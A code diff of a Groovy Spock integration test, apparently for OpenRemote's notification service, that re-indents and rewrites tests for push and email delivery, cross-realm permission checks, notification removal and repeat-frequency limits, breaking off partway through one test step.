-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-        notificationIds.size() == 3
-
-        when: "the admin user sends a notification to a user in a different realm with emailNotificationsDisabled set to false"
-        notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser3Id)]
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "the notification should have been sent"
-        conditions.eventually {
-            assert notificationIds.size() == 5
-        }
-
-        when: "a regular user sends a push notification to a user in a different realm"
-        notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
-        testuser1NotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a restricted user sends a push notification to another user in the same realm"
-        notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "an anonymous user sends a push notification to a user"
-        anonymousNotificationResource.sendNotification(null, notification)
-
-        then: "the request should be forbidden (no write:notifications role)"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "the admin user sends a push notification to the console assets in building realm"
-        notificationIds.clear()
-        notification.targets = [new Notification.Target(Notification.TargetType.ASSET, testuser2Console.id),
-                                new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
-                                new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id),
-                                new Notification.Target(Notification.TargetType.ASSET, anonymousConsole.id)]
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "the notification should have been sent (inc. testuser2 as message was direct to console)"
-        conditions.eventually {
-            assert notificationIds.size() == 4
-            assert notificationTargetIds.contains(testuser2Console.id)
-            assert notificationTargetIds.contains(testuser3Console1.id)
-            assert notificationTargetIds.contains(testuser3Console2.id)
-            assert notificationTargetIds.contains(anonymousConsole.id)
-        }
-
-        when: "a regular user sends a push notification to the console assets in a different realm"
-        testuser1NotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a regular user without write:notifications sends a push notification to the console assets in the same realm"
-        notificationIds.clear()
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        testuser2NotificationResource.sendNotification(null, notification)
-
-        then: "the request should be forbidden and no notification sent (write:notifications is now required to send)"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-        notificationIds.size() == 0
-
-        when: "a notification is sent using the same mechanism as an asset ruleset"
-        notificationIds.clear()
-        notificationService.sendNotification(notification, Notification.Source.ASSET_RULESET, consoleResource.getConsoleParentAssetId(realm))
-
-        then: "the notification should have been sent (inc. testuser2 as message was direct to console)"
-        conditions.eventually {
-            assert notificationIds.size() == 4
-            assert notificationTargetIds.contains(testuser2Console.id)
-            assert notificationTargetIds.contains(testuser3Console1.id)
-            assert notificationTargetIds.contains(testuser3Console2.id)
-            assert notificationTargetIds.contains(anonymousConsole.id)
-        }
-
-        when: "a restricted user sends a push notification to the console assets in the same realm"
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when: "a restricted user sends a push notification to some consoles linked to them and some not linked to them"
-        notificationIds.clear()
-        notification.targets = [new Notification.Target(Notification.TargetType.ASSET, testuser2Console.id),
-                                new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
-                                new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id),
-                                new Notification.Target(Notification.TargetType.ASSET, anonymousConsole.id)]
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "no notification should have been sent"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        and: "no new notifications should have been sent"
-        notificationIds.size() == 0
-
-        when: "a restricted user sends a push notification to some consoles linked to them"
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        notification.targets = [new Notification.Target(Notification.TargetType.ASSET, testuser3Console1.id),
-                                new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id)]
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "the notifications should have been sent"
-        conditions.eventually {
-            assert notificationIds.size() == 2
-            assert notificationTargetIds.contains(testuser3Console1.id)
-            assert notificationTargetIds.contains(testuser3Console2.id)
-        }
-
-        when: "the FCM token is set to null for a console asset"
-        notificationIds.clear()
-        notificationTargetIds.clear()
-        def testUser3Console1Asset = assetStorageService.find(testuser3Console1.id) as ConsoleAsset
-        testUser3Console1Asset.getConsoleProviders().map{it.get(PushNotificationMessage.TYPE)}.get().getData().put("token", null)
-        testUser3Console1Asset = assetStorageService.merge(testUser3Console1Asset)
-
-        then: "the cached FCM token should be removed from the handler"
-        conditions.eventually {
-            assert pushNotificationHandler.consoleFCMTokenMap.get(testUser3Console1Asset.id) == null
-        }
-
-        when: "the admin user sends a notification to a user linked to the console without an FCM token"
-        notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser3Id)]
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "the notification should have been sent"
-        conditions.eventually {
-            assert notificationIds.size() == 1
-            assert notificationTargetIds.contains(testuser3Console2.id)
-            assert !notificationTargetIds.contains(testuser3Console1.id)
-        }
-
-        when: "a notification handler throws an exception"
-        throwPushHandlerException = true
-        advancePseudoClock(1, TimeUnit.HOURS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "a bad request exception should be thrown"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        and: "the notification should be recorded in the DB with the exception set as the error"
-        conditions.eventually {
-            notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null)
-            notifications.first().error == "Failed to send notification"
-        }
-
-
-        // -----------------------------------------------
-        //    Check notification resource
-        // -----------------------------------------------
-
-        and: "all notifications sent to consoles in the building realm should be available via the REST API"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser2Console.id, null, null, null, null, null).length == 2
-            notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
-            assert notifications.length == 5
-            assert notifications.every {n ->
-                PushNotificationMessage pushMessage = n.message as PushNotificationMessage
-                pushMessage.getTitle() == "Test Action" &&
-                        pushMessage.getBody() == "Click to cancel" &&
-                        pushMessage.getAction() != null &&
-                        n.deliveredOn == null &&
-                        n.acknowledgedOn == null
-            }
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 7
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 3
-        }
-
-        when: "the admin user marks a Building console notification as delivered and requests the notifications for Building consoles"
-        adminNotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id}.id)
-
-        then: "the notification should have been updated"
-        conditions.eventually {
-            notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
-            assert notifications.length == 5
-            assert notifications.count {n -> n.deliveredOn != null} == 1
-        }
-
-        when: "the admin user marks a Building console notification as delivered and requests the notifications for Building consoles"
-        adminNotificationResource.notificationAcknowledged(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id && n.deliveredOn != null}.id, new TextNode("dismissed"))
-
-        then: "the notification should have been updated"
-        conditions.eventually {
-            notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null)
-            assert notifications.length == 5
-            assert notifications.count {n -> n.deliveredOn != null && n.acknowledgedOn != null && n.acknowledgement == "\"dismissed\""} == 1
-        }
-
-        when: "a regular user marks a console notification from another realm as delivered"
-        testuser1NotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id}.id)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a regular user marks a console notification for their own console as delivered"
-        testuser3NotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id}.id)
-
-        then: "the notification should have been updated"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null).count {it.deliveredOn != null} == 1
-        }
-
-// TODO: Update once console permissions model finalised
-//        when: "an anonymous user marks a console notification from another console as delivered"
-//        anonymousNotificationResource.notificationDelivered(null, testuser3Console1.id, notifications.find {n -> n.targetId == testuser3Console1.id}.id)
-//
-//        then: "access should be forbidden"
-//        ex = thrown()
-//        ex.response.withCloseable { r ->
-//            assert r.status == 403
-//        }
-
-        when: "an anonymous user marks a console notification for their own console as delivered"
-        notifications = adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null)
-        anonymousNotificationResource.notificationDelivered(null, anonymousConsole.id, notifications.find {n -> n.targetId == anonymousConsole.id}.id)
-
-        then: "the notification should have been updated"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).count {it.deliveredOn != null} == 1
-        }
-
-        when: "a regular user removes notifications of their own realm"
-        testuser1NotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, MASTER_REALM, null, null)
-
-        then: "write:notifications grants the delete and the other realm's notifications are untouched"
-        noExceptionThrown()
-        adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null).length > 0
-
-        when: "a restricted user tries to remove notifications"
-        testuser3NotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, realm, null, null)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "the admin user removes notifications by timestamp and the notifications are retrieved again"
-        notifications = adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null)
-        def sentNotification = notifications[0]
-        def removeCount = notifications.count {it.sentOn >= sentNotification.sentOn}
-        adminNotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, sentNotification.sentOn.toEpochMilli(), null, null, null, null)
-
-        then: "notifications sent after or at that time should have been removed"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null, null, null, null, null, null).length == (notifications.length - removeCount)
-        }
-
-        when: "the admin user removes notifications sent to specific console assets without other constraints and the notifications are retrieved again"
-        adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, testuser3Console1.id)
-        adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, testuser3Console2.id)
-
-        then: "all notifications sent to those consoles should have been removed"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console1.id, null, null, null, null, null).length == 0
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 0
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 3
-        }
-
-        when: "the admin user removes notifications by type and the notifications are retrieved again"
-        adminNotificationResource.removeNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, null)
-
-        then: "the notifications should have been removed"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, PushNotificationMessage.TYPE, null, null, null, null, anonymousConsole.id, null, null, null, null, null).length == 0
-        }
-
-        when: "the admin user removes notifications without sufficient constraints"
-        adminNotificationResource.removeNotifications(null, null, null, null, null, null, null, null)
-
-        then: "request should not be allowed"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        // -----------------------------------------------
-        //    Check notification repeat frequency
-        // -----------------------------------------------
-
-        when: "a repeat frequency is set and a notification is sent"
-        // Clear exception flag
-        throwPushHandlerException = false
-        // Move clock to beginning of next hour
-        def advancement = Instant.ofEpochMilli(getClockTimeOf(container))
-                .truncatedTo(ChronoUnit.HOURS)
-                .plus(59, ChronoUnit.MINUTES)
-
-        advancePseudoClock(ChronoUnit.MILLIS.between(Instant.ofEpochMilli(getClockTimeOf(container)), advancement), TimeUnit.MILLISECONDS, container)
-        notification.targets = [new Notification.Target(Notification.TargetType.ASSET, testuser3Console2.id)]
-        notification.setRepeatFrequency(RepeatFrequency.HOURLY)
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "the notification should have been sent to the console"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
-        }
-
-        when: "a repeat frequency is set and a notification with the same name and scope as a previous notification is sent within the repeat window"
-        testuser3NotificationResource.sendNotification(null, notification)
-
-        then: "no new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
-        }
-
-        when: "a repeat frequency is set and a notification with the same name but different scope is sent within the repeat window"
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 2
-        }
-
-        when: "time advances less than the repeat frequency and the notification is sent again"
-        advancePseudoClock(30, TimeUnit.SECONDS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "no new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 2
-        }
-
-        when: "time advances more than the repeat frequency and the notification is sent again"
-        advancePseudoClock(2, TimeUnit.MINUTES, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 3
-        }
-
-        when: "a repeat interval is used and a notification with the same name and scope is sent within the repeat window"
-        notification.setRepeatInterval("P1M")
-        advancePseudoClock(10, TimeUnit.DAYS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "no new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 3
-        }
-
-        when: "time advances more than the repeat interval and the notification is sent again"
-        advancePseudoClock(25, TimeUnit.DAYS, container)
-        adminNotificationResource.sendNotification(null, notification)
-
-        then: "new notifications should have been sent"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, null, null, null, null, testuser3Console2.id, null, null, null, null, null).length == 4
-        }
-
-        and: "notifications are retrieved only for the past day only the relevant notifications should have been returned"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, getClockTimeOf(container)-(3600000*24), null, null, null, testuser3Console2.id, null, null, null, null, null).length == 1
-        }
-
-        and: "notifications are retrieved only for the past 40 days only the relevant notifications should have been returned"
-        conditions.eventually {
-            assert adminNotificationResource.getNotifications(null, null, null, getClockTimeOf(container)-(3600000L*24*40), null, null, null, testuser3Console2.id, null, null, null, null, null).length == 4
-        }
-
-        cleanup: "the mock is removed"
-        notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), pushNotificationHandler)
+  def "Check push notification functionality"() {
+
+    List<String> notificationIds = new CopyOnWriteArrayList<>()
+    List<Notification.TargetType> notificationTargetTypes = new CopyOnWriteArrayList<>()
+    List<String> notificationTargetIds = new CopyOnWriteArrayList<>()
+    List<AbstractNotificationMessage> notificationMessages = new CopyOnWriteArrayList<>()
+
+    given: "the container environment is started with the mock handler"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.1, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def notificationService = container.getService(NotificationService.class)
+    def pushNotificationHandler = container.getService(PushNotificationHandler.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def consoleResource = (ConsoleResourceImpl)container.getService(ManagerWebService.class).apiSingletons.find {
+      it instanceof ConsoleResourceImpl
     }
 
-    def "Check email notification functionality"() {
-
-        List<Message> sentEmails = new CopyOnWriteArrayList<>()
-
-        given: "the container environment is started with the mock handler"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig() << [(OR_EMAIL_X_HEADERS): "Test 1: Hello World 1\nTest2: Hello World 2"], defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def notificationService = container.getService(NotificationService.class)
-        def identityService = container.getService(ManagerIdentityService.class)
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-
-        and: "a mock email notification handler"
-        EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
-        mockEmailNotificationHandler.isValid() >> true
-
-        // Log email and assume sent to SMTP Server
-        mockEmailNotificationHandler.sendMessage(_ as Message) >> {
-            Message email ->
-                sentEmails << email
-                return NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
-
-        when: "an email notification is sent to a realm through same mechanism as rules"
-        def notification = new Notification(
-                "Test",
-                new EmailNotificationMessage().setSubject("Test").setText("Hello world!"),
-                Collections.singletonList(new Notification.Target(Notification.TargetType.REALM, managerTestSetup.realmBuildingName)), null, null)
-        notificationService.sendNotification(notification, Notification.Source.REALM_RULESET, managerTestSetup.realmBuildingName)
-
-        then: "the email should have been sent to the realm users with email addresses and email notifications enabled"
-        conditions.eventually {
-            assert sentEmails.size() == 2
-            assert sentEmails.every {it.content == "Hello world!"}
-            assert sentEmails.every { it.getSubject() == "Test"}
-            assert sentEmails.every { it.allHeaders != null && it.getHeader("Test 1")[0] == "Hello World 1" && it.getHeader("Test2")[0] == "Hello World 2" }
-            assert sentEmails.any { it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "testuser2@openremote.local"}
-            assert !sentEmails.any { it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "testuser3@openremote.local"}
-            assert sentEmails.any { it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "building@openremote.local"}
-        }
-
-        when: "an email attribute is added to an asset"
-        sentEmails.clear()
-        def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId)
-        kitchen.setEmail("kitchen@openremote.local")
-        kitchen = assetStorageService.merge(kitchen)
-
-        and: "an email notification is sent to a parent asset"
-        ((EmailNotificationMessage)notification.message).subject = "Test 2"
-        notification.setTargets([new Notification.Target(Notification.TargetType.ASSET, managerTestSetup.apartment1KitchenId)])
-        notificationService.sendNotification(notification)
-
-        then: "the child asset with the email attribute should have been sent an email"
-        conditions.eventually {
-            assert sentEmails.size() == 1
-            assert sentEmails.any { it.getSubject() == "Test 2"}
-            assert sentEmails.any { it.allRecipients.length == 1 && (it.allRecipients[0] as InternetAddress).address == "kitchen@openremote.local"}
-        }
-
-        when: "an email is sent to a custom target"
-        sentEmails.clear()
-        ((EmailNotificationMessage)notification.message).subject = "Test Custom"
-        notification.setTargets([new Notification.Target(Notification.TargetType.CUSTOM, "custom1@openremote.local;to:custom2@openremote.local;cc:custom3@openremote.local;bcc:custom4@openremote.local")])
-        notificationService.sendNotification(notification)
-
-        then: "the email should have been sent to all custom recipients"
-        conditions.eventually {
-            assert sentEmails.size() == 1
-            assert sentEmails.any { it.getSubject() == "Test Custom" && it.allRecipients.length == 4}
-            assert sentEmails.any { it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.TO).any{(it as InternetAddress).address == "custom1@openremote.local"}}
-            assert sentEmails.any { it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.TO).any{(it as InternetAddress).address == "custom2@openremote.local"}}
-            assert sentEmails.any { it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.CC).any{(it as InternetAddress).address == "custom3@openremote.local"}}
-            assert sentEmails.any { it.getSubject() == "Test Custom" && it.getRecipients(Message.RecipientType.BCC).any{(it as InternetAddress).address == "custom4@openremote.local"}}
-        }
-
-        cleanup: "the mock is removed"
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+    and: "a mock push notification handler"
+    def throwPushHandlerException = false
+    PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      if (throwPushHandlerException) {
+        throw new Exception("Failed to send notification")
+      }
+      notificationIds << id
+      notificationTargetTypes << target.type
+      notificationTargetIds << target.id
+      notificationMessages << message
+      callRealMethod()
+    }
+    // Assume sent to FCM
+    mockPushNotificationHandler.sendMessage(_ as com.google.firebase.messaging.Message) >> { message ->
+      return NotificationSendResult.success()
     }
 
-    def "Check localized notification functionality"() {
+    notificationService.notificationHandlerMap.put(pushNotificationHandler.getTypeName(), mockPushNotificationHandler)
 
-        List<String> localizedNotificationIds = new CopyOnWriteArrayList<>()
-        List<Notification.TargetType> localizedNotificationTargetTypes = new CopyOnWriteArrayList<>()
-        List<String> localizedNotificationTargetIds = new CopyOnWriteArrayList<>()
-        List<AbstractNotificationMessage> localizedNotificationMessages = new CopyOnWriteArrayList<>()
+    and: "an authenticated test user"
+    def realm = keycloakTestSetup.realmBuilding.name
+    def testuser1AccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+    def testuser2AccessToken = authenticate(
+            container,
+            realm,
+            KEYCLOAK_CLIENT_ID,
+            "testuser2",
+            "testuser2"
+            )
+    def testuser3AccessToken = authenticate(
+            container,
+            realm,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
 
-        List<String> pushNotificationIds = new CopyOnWriteArrayList<>()
-        List<Notification.TargetType> pushNotificationTargetTypes = new CopyOnWriteArrayList<>()
-        List<String> pushNotificationTargetIds = new CopyOnWriteArrayList<>()
-        List<AbstractNotificationMessage> pushNotificationMessages = new CopyOnWriteArrayList<>()
+    and: "an authenticated superuser"
+    def adminAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        given: "the container environment is started with the mock handler"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.1, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def identityService = container.getService(ManagerIdentityService.class)
-        def notificationService = container.getService(NotificationService.class)
-        def pushNotificationHandler = container.getService(PushNotificationHandler.class)
-        def localizedNotificationHandler = container.getService(LocalizedNotificationHandler.class)
+    def notification = new Notification("TestAction",
+            new PushNotificationMessage("Test Action",
+            "Click to cancel",
+            writeAttributeValueAction(
+                    new AttributeRef(
+                            managerTestSetup.apartment1LivingroomId,
+                            "alarmEnabled"
+                            ),
+                    false), null, null), null, null, null)
 
-        /* ----- */
+    and: "the notification resource"
+    def testuser1NotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(NotificationResource.class)
+    def testuser2NotificationResource = getClientApiTarget(serverUri(serverPort), realm, testuser2AccessToken).proxy(NotificationResource.class)
+    def testuser3NotificationResource = getClientApiTarget(serverUri(serverPort), realm, testuser3AccessToken).proxy(NotificationResource.class)
+    def adminNotificationResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(NotificationResource.class)
+    def anonymousNotificationResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(NotificationResource.class)
+    def testuser1ConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, testuser1AccessToken).proxy(ConsoleResource.class)
+    def testuser2ConsoleResource = getClientApiTarget(serverUri(serverPort), realm, testuser2AccessToken).proxy(ConsoleResource.class)
+    def testuser3ConsoleResource = getClientApiTarget(serverUri(serverPort), realm, testuser3AccessToken).proxy(ConsoleResource.class)
+    def adminConsoleResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(ConsoleResource.class)
+    def anonymousConsoleResource = getClientApiTarget(serverUri(serverPort), realm).proxy(ConsoleResource.class)
+    SentNotification[] notifications = new CopyOnWriteArrayList<>()
 
-        and: "a mock push notification handler"
-        def throwPushHandlerException = false
-        PushNotificationHandler mockPushNotificationHandler = Spy(pushNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
+    when: "various consoles are registered"
+    def consoleRegistration = new ConsoleRegistration(null,
+            "Test Console",
+            "1.0",
+            "Android 7.0",
+            new HashMap<String, ConsoleProvider>(
+                    geofence: new ConsoleProvider(
+                            ORConsoleGeofenceAssetAdapter.NAME,
+                            true,
+                            false,
+                            false,
+                            false,
+                            false,
+                            null
+                            ),
+                    push: new ConsoleProvider(
+                            "fcm",
+                            true,
+                            true,
+                            true,
+                            true,
+                            false,
+                            (Map) parse("{\"token\": \"23123213ad2313b0897efd\"}").orElse(null)
+                            )
+                    ),
+            "",
+            ["manager"] as String[])
+    def testuser2Console = testuser2ConsoleResource.register(null, consoleRegistration)
+    def testuser3Console1 = testuser3ConsoleResource.register(null, consoleRegistration)
+    def testuser3Console2 = testuser3ConsoleResource.register(null, consoleRegistration)
+    def adminConsole = adminConsoleResource.register(null, consoleRegistration)
+    def anonymousConsole = anonymousConsoleResource.register(null, consoleRegistration)
 
-        // Intercept the messages sent
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                if (throwPushHandlerException) {
-                    throw new Exception("Failed to send notification")
-                }
-                pushNotificationIds << id
-                pushNotificationTargetTypes << target.type
-                pushNotificationTargetIds << target.id
-                pushNotificationMessages << message
-                callRealMethod()
+    then: "the consoles should have been created"
+    testuser2Console.id != null
+    testuser3Console1.id != null
+    testuser3Console2.id != null
+    adminConsole.id != null
+    anonymousConsole.id != null
+
+    when: "the admin user sends a push notification to an entire realm"
+    notification.targets = [new Notification.Target(Notification.TargetType.REALM, keycloakTestSetup.realmBuilding.name)]
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "all consoles in that realm should have been sent a notification (excluding testuser2 as they have disabled push notifications)"
+    conditions.eventually {
+      assert notificationIds.size() == 3
+      assert notificationTargetTypes.count { t -> t == Notification.TargetType.ASSET } == 3
+      assert !notificationTargetIds.contains(testuser2Console.id)
+      assert notificationTargetIds.contains(testuser3Console1.id)
+      assert notificationTargetIds.contains(testuser3Console2.id)
+      assert notificationTargetIds.contains(anonymousConsole.id)
+      assert notificationMessages.count { m ->
+        m instanceof PushNotificationMessage && m.title == "Test Action" && m.body == "Click to cancel" && m.action != null
+      } == 3
+    }
+
+    when: "a regular user without write:notifications sends a push notification to an entire realm"
+    testuser2NotificationResource.sendNotification(null, notification)
+
+    then: "the request should be forbidden (no write:notifications role)"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "the admin user sends a notification to a user in a different realm with emailNotificationsDisabled set to true"
+    notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+    notificationIds.size() == 3
+
+    when: "the admin user sends a notification to a user in a different realm with emailNotificationsDisabled set to false"
+    notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser3Id)]
+    advancePseudoClock(1, TimeUnit.HOURS, container)
+    adminNotificationResource.sendNotification(null, notification)
+
+    then: "the notification should have been sent"
+    conditions.eventually {
+      assert notificationIds.size() == 5
+    }
+
+    when: "a regular user sends a push notification to a user in a different realm"
+    notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
+    testuser1NotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a restricted user sends a push notification to another user in the same realm"
+    notification.targets = [new Notification.Target(Notification.TargetType.USER, keycloakTestSetup.testuser2Id)]
+    testuser3NotificationResource.sendNotification(null, notification)
+
+    then: "no notification should have been sent"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "an anonymous user sends a push notification to a user"
